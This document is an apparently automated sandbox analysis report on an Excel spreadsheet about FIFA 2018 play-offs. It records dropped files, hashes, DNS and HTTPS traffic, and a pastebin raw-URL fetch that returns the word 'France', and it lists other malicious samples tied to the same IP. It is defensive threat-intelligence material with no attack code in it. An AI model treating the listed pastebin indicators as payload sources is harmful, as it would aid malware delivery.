Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
104.20.208.21gH5B1uCTfZ.exeGet hashmaliciousBrowse
  • pastebin.com/raw/uTLbvk2v
Payment Slip.xlsGet hashmaliciousBrowse
  • pastebin.com/raw/6fDfe1Ty
Eur 72,000.xlsGet hashmaliciousBrowse
  • pastebin.com/raw/Cbt2DYUh
Payment Slip.xlsGet hashmaliciousBrowse
  • pastebin.com/raw/6fDfe1Ty
resume2.docGet hashmaliciousBrowse
  • pastebin.com/raw/Euzk3Ht4
Mv Orient pluto_epda.docGet hashmaliciousBrowse
  • pastebin.com/raw/9t3R1Ng5
Eur 72,000.xlsGet hashmaliciousBrowse
  • www.pastebin.com/raw/HX72131y

Domains

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
pastebin.comTreezyGen.exeGet hashmaliciousBrowse
  • 104.20.209.21
UuspOFRFQV.docxGet hashmaliciousBrowse
  • 104.20.209.21
gH5B1uCTfZ.exeGet hashmaliciousBrowse
  • 104.20.208.21
virus.shGet hashmaliciousBrowse
  • 104.20.208.21
Windows%2010%20Pro%20X64%20Redstone%204%20MULTi-6%20JUNE%202018%20{Gen2}.exeGet hashmaliciousBrowse
  • 104.20.208.21
8ah9igjm9MGet hashmaliciousBrowse
  • 104.20.209.21
PO53473.docGet hashmaliciousBrowse
  • 104.20.209.21
1556085199x1822611307.exeGet hashmaliciousBrowse
  • 104.20.208.21
miner.elfGet hashmaliciousBrowse
  • 104.20.208.21
63250ebdf69c4bf280c3b8cc82600a75Get hashmaliciousBrowse
  • 104.20.209.21
RSEBBScan0023.docGet hashmaliciousBrowse
  • 104.20.209.21
Payment Slip.xlsGet hashmaliciousBrowse
  • 104.20.208.21
resume2.docGet hashmaliciousBrowse
  • 104.20.209.21
49inv. No. 8234 - 21.03.2019.batGet hashmaliciousBrowse
  • 104.20.209.21
miner.elfGet hashmaliciousBrowse
  • 104.20.208.21
Documenta#U00c3#U00a7#U00c3#U00a3o.docGet hashmaliciousBrowse
  • 104.20.209.21
Payment Slip.xlsGet hashmaliciousBrowse
  • 104.20.209.21
c3#U30d7.docGet hashmaliciousBrowse
  • 104.20.209.21
5Quotation-List.docGet hashmaliciousBrowse
  • 104.20.209.21
cmrDocument.docGet hashmaliciousBrowse
  • 104.20.208.21

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
unknownInvoice0186.pdfGet hashmaliciousBrowse
  • 192.168.0.40
P_2038402.xlsxGet hashmaliciousBrowse
  • 192.168.0.44
bad.pdfGet hashmaliciousBrowse
  • 192.168.0.44
RFQ.pdfGet hashmaliciousBrowse
  • 192.168.0.44
100323.pdfGet hashmaliciousBrowse
  • 192.168.0.44
Copy.pdfGet hashmaliciousBrowse
  • 127.0.0.1
2.exeGet hashmaliciousBrowse
  • 192.168.0.40
UPPB502981.docGet hashmaliciousBrowse
  • 192.168.0.44
Adm_Boleto.via2.comGet hashmaliciousBrowse
  • 192.168.0.40
00ECF4AD.exeGet hashmaliciousBrowse
  • 192.168.0.40
PDF_100987464500.exeGet hashmaliciousBrowse
  • 192.168.0.40
filedata.exeGet hashmaliciousBrowse
  • 192.168.0.40
.exeGet hashmaliciousBrowse
  • 192.168.1.60
33redacted@threatwave.comGet hashmaliciousBrowse
  • 192.168.1.71

JA3 Fingerprints

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
7dcce5b76c8b17472d024758970a406bhttps://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fu9307752.ct.sendgrid.net%2Fwf%2Fclick%3Fupn%3DGpYfDGokPDBd7a4JqlZ9WfT6EI7gBzuWWau4Ao6MxveOhDGkTP2NDDF74KIUBot5Xue-2B-2BZzkuyTs-2FMAFOUuOAw-3D-3D_1MpuJKsTcV-2FDn0j31QRy2FUm-2F1QmdDQLjriB9ZlK-2FO7354QSGTGJp-2F-2FkbRrYO9QPGKH-2BrIlGX36oD-2FWNemqQBBXzKC3s4wx4v3zmeUe3tP1DKkVuheGDXlSPY9DuDd1bD-2BdF-2Ft-2FdQQ3XxZYnPyQkw1P8x-2FIPpYp8-2FRcAlMIjkgpQHTBy5fbZOi2ZQBpHgRkAWnRZK36uxr-2FOs822ATyj6U3kJhomCxT8O3oHNLu8qUIbm3EGI89yjNhHWe1PfAmd7VQexgNJD-2FqUzGDF396-2B-2Bvkm-2BffMWxdB3KEuIbJdybnz7QVYkBx3kcdhzFRbxuSAR7jN2OFB50-2FScqEF1M8hAm-2B0P7Bonij00wvHvBCt9Z7tW0hzublbYKEIZLvkeRBNMgdXVTHttutvicMlP6Umlw-3D-3D&data=02%7C01%7Cgenalyn_navarro%40transalta.com%7C1c952194cb3c44b0846d08d6765596aa%7Caff3442b5f55409cbe77da97b366435a%7C0%7C1%7C636826507326727180&sdata=Et8iaZoOla8p6jYVkLpNfiy2FAnaadsrihAL0LiNRNc%3D&reserved=0Get hashmaliciousBrowse
  • 104.20.208.21
zTf1CPsXQ5.dllGet hashmaliciousBrowse
  • 104.20.208.21
https://na01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdivingaustralia-my.sharepoint.com%2F%3Aw%3A%2Fr%2Fpersonal%2Ffinance_diving_org_au%2F_layouts%2F15%2FDoc.aspx%3Fsourcedoc%3D%257B8604b0f1-f91a-4f57-a1d4-a13866ae1126%257D%26action%3Ddefault&data=02%7C01%7Cshaun_clifford%40transalta.com%7C55ae28615dbb4510560c08d67800791b%7Caff3442b5f55409cbe77da97b366435a%7C0%7C1%7C636828340784416456&sdata=hTEF%2Bkmzfx6b5O7cG4iyYN1WuJqFA9K9seH4ZzgBZQI%3D&reserved=0Get hashmaliciousBrowse
  • 104.20.208.21
https://www.dropbox.com/s/fxkkcv0d2do3urr/Purchase Order.jpg.z?dl=1Get hashmaliciousBrowse
  • 104.20.208.21
Pu3xMAg7v8.docGet hashmaliciousBrowse
  • 104.20.208.21
957043_6ZK2400309.xmlGet hashmaliciousBrowse
  • 104.20.208.21
INVOICE.docGet hashmaliciousBrowse
  • 104.20.208.21
Operating Agreement 0102282019a00.docGet hashmaliciousBrowse
  • 104.20.208.21
salesrequest321.docGet hashmaliciousBrowse
  • 104.20.208.21
PO53473.docGet hashmaliciousBrowse
  • 104.20.208.21
freeformatter-decode.docGet hashmaliciousBrowse
  • 104.20.208.21
Office365 Audio Conferencin80.docGet hashmaliciousBrowse
  • 104.20.208.21
Voicesea.rtfGet hashmaliciousBrowse
  • 104.20.208.21
Quote _ Drawin.docGet hashmaliciousBrowse
  • 104.20.208.21
FMq08TtsCL.exeGet hashmaliciousBrowse
  • 104.20.208.21
370421.docGet hashmaliciousBrowse
  • 104.20.208.21
DHL-Invoice.docGet hashmaliciousBrowse
  • 104.20.208.21
yikxCT3OyK.docGet hashmaliciousBrowse
  • 104.20.208.21
https://headlabzserver.com/.sharepointGet hashmaliciousBrowse
  • 104.20.208.21
RSEBBScan0023.docGet hashmaliciousBrowse
  • 104.20.208.21

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Startup

  • System is w7_6
  • EXCEL.EXE (PID: 2056 cmdline: 'C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE' /automation -Embedding MD5: D49DA5A2EE723A5D236D4DD6059C37CB)
  • cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\15.0\OfficeFileCache\CentralTable.laccdb
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:data
Size (bytes):64
Entropy (8bit):1.4485360556164644
Encrypted:false
MD5:ADE811BE378EEFCC87629FD9974F9EF9
SHA1:10702748280B399FA9D8AB208D3D6568054B1A45
SHA-256:58D9624832F19F8A2B5E38555433A2904BF2E0F6641CB530F417ADB2653F0609
SHA-512:4F940A536FC0C79AD9015D292B708B06370A5C495278DF878E0E86B3E2EF6C1413019D5B1E71452CDD044BD5CBEC49FBA0CD2B28B453909C325DEAC381EED7E3
Malicious:false
Reputation:low
Preview:971342. Admin.
C:\Users\user\AppData\Local\Microsoft\Office\OTeleData_2056_1.etl
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Targa image data - Map 65536 x 65536 x 0
Size (bytes):66048
Entropy (8bit):0.161519290276026
Encrypted:false
MD5:E9C3E0D56C3CF9A93CF4C9B60036CC50
SHA1:7B9E2350E948EFCED003F1758C25A18D50B5D072
SHA-256:AF994060E8CA61DB2D6D4A300292317BB7058C012410767A4EBA918ADB3160E9
SHA-512:C29F27139120D95F7FBCCA971D7712C2259FA8B8D9042F92A7F8C830AA093C41A3773A0C04D03D3F7C8A80D8C3DDDF876FA346480AA540664E407B76A0259AE7
Malicious:false
Reputation:low
Preview:..........................................................................................;{....................................Zb..2.......................`...............@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1................................................................-....#.....v....-..........O.T.e.l.e.2.0.5.6...C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.m.i.c.r.o.s.o.f.t.\.o.f.f.i.c.e.\.O.T.e.l.e.D.a.t.a._.2.0.5.6._.1...e.t.l...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Office\OTeleData_2056_2.etl
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Targa image data - Map 65536 x 65536 x 0
Size (bytes):65536
Entropy (8bit):0.09089392634852894
Encrypted:false
MD5:A9AB6FEC130DA08197ED266604594207
SHA1:2EBD9E8103DC25B9558739F3B08CA56C935AE31D
SHA-256:1FCAAD366A5B3EADB1275B06390B0A7BA4AE34CDECBB5EE3F874D575FB581722
SHA-512:5A892B85D6D29A765C0DA0E4A1CE19D6893BC1B4370411717E90C1ED4BA0BDCE04270B77BA177011E2B4130360A63FBF0CA088AD3D7597D38D32E0FE5F94C6F4
Malicious:false
Reputation:low
Preview:..........................................................................................;{....................................Zb..2.......................`...............@.t.z.r.e.s...d.l.l.,.-.3.2.2.......................................................@.t.z.r.e.s...d.l.l.,.-.3.2.1................................................................-....#.....v....-..........O.T.e.l.e.2.0.5.6...C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.m.i.c.r.o.s.o.f.t.\.o.f.f.i.c.e.\.O.T.e.l.e.D.a.t.a._.2.0.5.6._.2...e.t.l...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Power Query\User.zip
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):2484
Entropy (8bit):5.524272474297159
Encrypted:false
MD5:DA1DB278262E15C86C812CAA118EE64E
SHA1:11FFF3AB86981C2B01F10C02772913C80CF4D421
SHA-256:CE2D6CD009EFADF2C06A4CA3787BE7B9002C2EA703AA9FF38433DE65E12ABB5A
SHA-512:6488ED6F73A383C2298E56B3F33A4C89E147A0CF64BDE4B45A5284F783868F00B0DF16D4BA212B1F24EE49990F8D96378BD36DA36E531F4532E3FA17837FC70C
Malicious:false
Reputation:low
Preview:PK........9t.M.(5.........%...UserCorrelation/UserCorrelationID.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UserCorrelationID xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><CorrelationID>e5ff1b18-b888-431f-a1e1-a9ded562441c</CorrelationID></UserCorrelationID>PK........:t.M..............[Content_Types].xml ...(........................<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="text/xml" /></Types>PK........Ap.N;..^C...C.......UserInterface/Settings.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UISettingsConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><Entries><Entry Type="SearchHistory" Value="s{&quot;SearchHistoryEntries&quot;:[]}" /><Entry Type="FormulaBuilderHistory" Value="s[]" /></Entries></UISettingsConfig>
C:\Users\user\AppData\Local\Microsoft\Power Query\temp.User.zip
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:Zip archive data, at least v1.0 to extract
Size (bytes):2484
Entropy (8bit):5.524272474297159
Encrypted:false
MD5:DA1DB278262E15C86C812CAA118EE64E
SHA1:11FFF3AB86981C2B01F10C02772913C80CF4D421
SHA-256:CE2D6CD009EFADF2C06A4CA3787BE7B9002C2EA703AA9FF38433DE65E12ABB5A
SHA-512:6488ED6F73A383C2298E56B3F33A4C89E147A0CF64BDE4B45A5284F783868F00B0DF16D4BA212B1F24EE49990F8D96378BD36DA36E531F4532E3FA17837FC70C
Malicious:false
Reputation:low
Preview:PK........9t.M.(5.........%...UserCorrelation/UserCorrelationID.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UserCorrelationID xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><CorrelationID>e5ff1b18-b888-431f-a1e1-a9ded562441c</CorrelationID></UserCorrelationID>PK........:t.M..............[Content_Types].xml ...(........................<?xml version="1.0" encoding="utf-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="text/xml" /></Types>PK........Ap.N;..^C...C.......UserInterface/Settings.xml ...(........................<?xml version="1.0" encoding="utf-8"?><UISettingsConfig xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><Entries><Entry Type="SearchHistory" Value="s{&quot;SearchHistoryEntries&quot;:[]}" /><Entry Type="FormulaBuilderHistory" Value="s[]" /></Entries></UISettingsConfig>
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EAYYUSJB\PX31NCah[1].txt
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:ASCII text, with no line terminators
Size (bytes):6
Entropy (8bit):2.584962500721156
Encrypted:false
MD5:0309A6C666A7A803FDB9DB95DE71CF01
SHA1:E3772AC4B4DB87B4A8DBFA59EF43CD1A8AD29515
SHA-256:7A1CA4EF7515F7276BAE7230545829C27810C9D9E98AB2C06066BEE6270D5153
SHA-512:F4A0036E39048EEC506221E517EBF2A73D37FF9316A6CB8A3A7931D6C947AF8FAB6AD67F8FFB29E8368346BA03776AC6F59D0FE916EA2333806201E83B2B6F90
Malicious:false
Reputation:low
Preview:France
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0PUBVDYD.txt
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:ASCII text
Size (bytes):113
Entropy (8bit):4.420861574546612
Encrypted:false
MD5:5E2F506F6AF259F9840AE5CDEBC094EB
SHA1:C37B1510FAB9EAE7B3C532BCDD564710E5B96F6A
SHA-256:CE43462C29F57B5450EB6430BFE7FEA98928609B950C73D8BCAF3B4B9D145DBC
SHA-512:918A5D50F786A3F5A488B5F7FEAE14CCE00F2CEC884FAB56336B91B63854D42629D0C7547E8C42526B891A599AB692CBF9132CCDB41F31D9050FD1955396B255
Malicious:false
Reputation:low
Preview:__cfduid.d077fe119c9a9683a5d83d489f4961b011561723337.pastebin.com/.9728.3446270592.30821498.951854392.30748073.*.
C:\Users\user\Desktop\~$FIFA World Cup 2018 - Play offs.xlsx
Process:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
File Type:data
Size (bytes):165
Entropy (8bit):1.8365963555552802
Encrypted:false
MD5:5822E168D778D80B9466A54204F2161E
SHA1:CE1E40071C16A0CC9C3ABB413AF7C248DFDDF52B
SHA-256:CEBDA0490B50C36E193E69BF903F65366718DC4B0C91CC5A2F45510AC7196C32
SHA-512:0A5E8C1DE75262FD0ACC5B717D83767CFFEA8ECD3123713952084B674F81A4E167BAC899886F349F6B098772624C81807F36EA8D8F8D452DC8DDF7CCB8B44F4B
Malicious:false
Reputation:moderate, very likely benign file
Preview:.user ..l.u.k.e.t.a.y.l.o.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pastebin.com
104.20.208.21
truefalsehigh

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://pastebin.com/raw/PX31NCahfalse
    		high

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPCountryFlagASNASN NameMalicious
    104.20.208.21
    		United States
    		13335unknownfalse

    Static File Info

    General

    File type:Microsoft Excel 2007+
    Entropy (8bit):7.343749225647534
    TrID:
    • Excel Microsoft Office Open XML Format document (50504/1) 86.33%
    • ZIP compressed archive (8000/1) 13.67%
    File name:FIFA World Cup 2018 - Play offs.xlsx
    File size:15957
    MD5:5d1d8c417915042f8ff85fa7af619696
    SHA1:e45c9c421a5c529b48881774788a6b9f46fdd8a9
    SHA256:d8ff705565030ed311f18cc7637f918b2d98cd01f7fb5f65d197e4c6d20dcc1d
    SHA512:b7fbc7bc3848da0ba9dd0a41527121a678df68afa14d50e82b0a75b05d69255e9c99fc6bbac460b58600c41d6c219e082c0a5bfc63951360db8965b0253b3249
    SSDEEP:384:7nXxj8H7sDJZq5noCziL+msVUlM9zhmPq/dCfqlgtNvZ:bXxjS0qnT+cVxlsq/0f/bvZ
    File Content Preview:PK..........!..a.|............[Content_Types].xml ...(.........................................................................................................................................................................................................

    File Icon

    Icon Hash:74ecd0d2d6d6d0dc

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jun 28, 2019 14:02:16.823534012 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:16.823579073 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:16.823813915 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:16.832427025 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:16.832449913 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.105977058 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.105997086 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.106004000 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.106131077 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.145608902 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.145646095 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.146055937 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.146167994 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.171225071 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.212191105 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.297137976 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.297271013 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.297295094 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.297775984 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.322895050 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.323023081 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.323049068 CEST44349196104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.323174953 CEST49196443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.413634062 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.413678885 CEST44349197104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.414031029 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.422125101 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.422158957 CEST44349197104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.451010942 CEST44349197104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.451137066 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.459671021 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.465676069 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.465709925 CEST44349197104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.749778986 CEST44349197104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.750128031 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.750152111 CEST44349197104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.750355005 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.796628952 CEST49197443192.168.1.94104.20.208.21
    Jun 28, 2019 14:02:17.796783924 CEST44349197104.20.208.21192.168.1.94
    Jun 28, 2019 14:02:17.797198057 CEST49197443192.168.1.94104.20.208.21

    UDP Packets

    TimestampSource PortDest PortSource IPDest IP
    Jun 28, 2019 14:01:18.384176970 CEST5297253192.168.1.948.8.8.8
    Jun 28, 2019 14:01:18.417377949 CEST53529728.8.8.8192.168.1.94
    Jun 28, 2019 14:01:18.446657896 CEST6149453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:18.478194952 CEST53614948.8.8.8192.168.1.94
    Jun 28, 2019 14:01:18.619041920 CEST5038653192.168.1.948.8.8.8
    Jun 28, 2019 14:01:18.632085085 CEST53503868.8.8.8192.168.1.94
    Jun 28, 2019 14:01:19.612535000 CEST5038653192.168.1.948.8.8.8
    Jun 28, 2019 14:01:19.634043932 CEST53503868.8.8.8192.168.1.94
    Jun 28, 2019 14:01:20.612766027 CEST5038653192.168.1.948.8.8.8
    Jun 28, 2019 14:01:20.627486944 CEST53503868.8.8.8192.168.1.94
    Jun 28, 2019 14:01:22.612494946 CEST5038653192.168.1.948.8.8.8
    Jun 28, 2019 14:01:22.625050068 CEST53503868.8.8.8192.168.1.94
    Jun 28, 2019 14:01:23.693802118 CEST5827553192.168.1.948.8.8.8
    Jun 28, 2019 14:01:23.823741913 CEST53582758.8.8.8192.168.1.94
    Jun 28, 2019 14:01:27.008975983 CEST5038653192.168.1.948.8.8.8
    Jun 28, 2019 14:01:27.021960974 CEST53503868.8.8.8192.168.1.94
    Jun 28, 2019 14:01:28.525607109 CEST6265453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:28.539066076 CEST53626548.8.8.8192.168.1.94
    Jun 28, 2019 14:01:29.519720078 CEST6265453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:29.535017014 CEST53626548.8.8.8192.168.1.94
    Jun 28, 2019 14:01:30.518970013 CEST6265453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:30.537745953 CEST53626548.8.8.8192.168.1.94
    Jun 28, 2019 14:01:32.518948078 CEST6265453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:32.531409025 CEST53626548.8.8.8192.168.1.94
    Jun 28, 2019 14:01:36.518946886 CEST6265453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:36.532989979 CEST53626548.8.8.8192.168.1.94
    Jun 28, 2019 14:01:38.359791040 CEST5453053192.168.1.948.8.8.8
    Jun 28, 2019 14:01:38.380599022 CEST53545308.8.8.8192.168.1.94
    Jun 28, 2019 14:01:38.399297953 CEST6291453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:38.412040949 CEST53629148.8.8.8192.168.1.94
    Jun 28, 2019 14:01:38.608128071 CEST5671953192.168.1.948.8.8.8
    Jun 28, 2019 14:01:38.640850067 CEST53567198.8.8.8192.168.1.94
    Jun 28, 2019 14:01:38.654901028 CEST6051453192.168.1.948.8.8.8
    Jun 28, 2019 14:01:38.667884111 CEST53605148.8.8.8192.168.1.94
    Jun 28, 2019 14:02:16.717029095 CEST6331053192.168.1.948.8.8.8
    Jun 28, 2019 14:02:16.730118990 CEST53633108.8.8.8192.168.1.94
    Jun 28, 2019 14:02:33.807992935 CEST5133053192.168.1.948.8.8.8
    Jun 28, 2019 14:02:33.820667982 CEST53513308.8.8.8192.168.1.94
    Jun 28, 2019 14:02:34.799719095 CEST5133053192.168.1.948.8.8.8
    Jun 28, 2019 14:02:34.812710047 CEST53513308.8.8.8192.168.1.94
    Jun 28, 2019 14:02:35.799371958 CEST5133053192.168.1.948.8.8.8
    Jun 28, 2019 14:02:35.812182903 CEST53513308.8.8.8192.168.1.94
    Jun 28, 2019 14:02:37.799467087 CEST5133053192.168.1.948.8.8.8
    Jun 28, 2019 14:02:37.812052011 CEST53513308.8.8.8192.168.1.94
    Jun 28, 2019 14:02:41.822990894 CEST5133053192.168.1.948.8.8.8
    Jun 28, 2019 14:02:41.835555077 CEST53513308.8.8.8192.168.1.94

    DNS Queries

    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
    Jun 28, 2019 14:02:16.717029095 CEST192.168.1.948.8.8.80xdb5Standard query (0)pastebin.comA (IP address)IN (0x0001)

    DNS Answers

    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
    Jun 28, 2019 14:01:38.640850067 CEST8.8.8.8192.168.1.940xcb1eNo error (0)2-01-4ca6-0004.cdx.cedexis.netmain.dl.ms.akadns.netCNAME (Canonical name)IN (0x0001)
    Jun 28, 2019 14:01:38.667884111 CEST8.8.8.8192.168.1.940x7aa4No error (0)2-01-4ca6-0004.cdx.cedexis.netmain.dl.ms.akadns.netCNAME (Canonical name)IN (0x0001)
    Jun 28, 2019 14:02:16.730118990 CEST8.8.8.8192.168.1.940xdb5No error (0)pastebin.com104.20.208.21A (IP address)IN (0x0001)
    Jun 28, 2019 14:02:16.730118990 CEST8.8.8.8192.168.1.940xdb5No error (0)pastebin.com104.20.209.21A (IP address)IN (0x0001)

    HTTP Request Dependency Graph

    • pastebin.com

    HTTPS Proxied Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.1.9449196104.20.208.21443C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    2019-06-28 12:02:17 UTC0OUTOPTIONS /raw/ HTTP/1.1
    X-IDCRL_ACCEPTED: t
    User-Agent: Microsoft Office Protocol Discovery
    Host: pastebin.com
    Content-Length: 0
    Connection: Keep-Alive
    2019-06-28 12:02:17 UTC0INHTTP/1.1 200 OK
    Date: Fri, 28 Jun 2019 12:02:17 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: __cfduid=d077fe119c9a9683a5d83d489f4961b011561723337; expires=Sat, 27-Jun-20 12:02:17 GMT; path=/; domain=.pastebin.com; HttpOnly
    Vary: Accept-Encoding
    X-XSS-Protection: 1; mode=block
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Server: cloudflare
    CF-RAY: 4edf82c95f14cc3a-ZRH
    2019-06-28 12:02:17 UTC0INData Raw: 31 33 0d 0a 45 72 72 6f 72 20 77 69 74 68 20 74 68 69 73 20 49 44 21 0d 0a
    Data Ascii: 13Error with this ID!
    2019-06-28 12:02:17 UTC0INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.1.9449197104.20.208.21443C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
    TimestampkBytes transferredDirectionData
    2019-06-28 12:02:17 UTC0OUTGET /raw/PX31NCah HTTP/1.1
    Accept: text/html, text/plain, text/xml
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)
    Accept-Encoding: gzip, deflate
    Host: pastebin.com
    Connection: Keep-Alive
    Cookie: __cfduid=d077fe119c9a9683a5d83d489f4961b011561723337
    2019-06-28 12:02:17 UTC1INHTTP/1.1 200 OK
    Date: Fri, 28 Jun 2019 12:02:17 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: public, max-age=1801
    X-XSS-Protection: 1; mode=block
    CF-Cache-Status: EXPIRED
    Expires: Fri, 28 Jun 2019 12:32:18 GMT
    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    Server: cloudflare
    CF-RAY: 4edf82cb7d88cc3e-ZRH
    2019-06-28 12:02:17 UTC1INData Raw: 36 0d 0a 46 72 61 6e 63 65 0d 0a
    Data Ascii: 6France
    2019-06-28 12:02:17 UTC1INData Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


    Code Manipulations

    Statistics

    CPU Usage

    Click to jump to process

    Memory Usage

    Click to jump to process

    High Level Behavior Distribution

    Click to dive into process behavior distribution

    System Behavior

    Analysis Process: EXCEL.EXE PID: 2056 Parent PID: 568

    General

    Start time:14:00:27
    Start date:28/06/2019
    Path:C:\Program Files\Microsoft Office 15\root\office15\EXCEL.EXE
    Wow64 process (32bit):false
    Commandline:'C:\Program Files\Microsoft Office 15\Root\Office15\EXCEL.EXE' /automation -Embedding
    Imagebase:0x240000
    File size:25749600 bytes
    MD5 hash:D49DA5A2EE723A5D236D4DD6059C37CB
    Has administrator privileges:true
    Programmed in:.Net C# or VB.NET
    Reputation:low

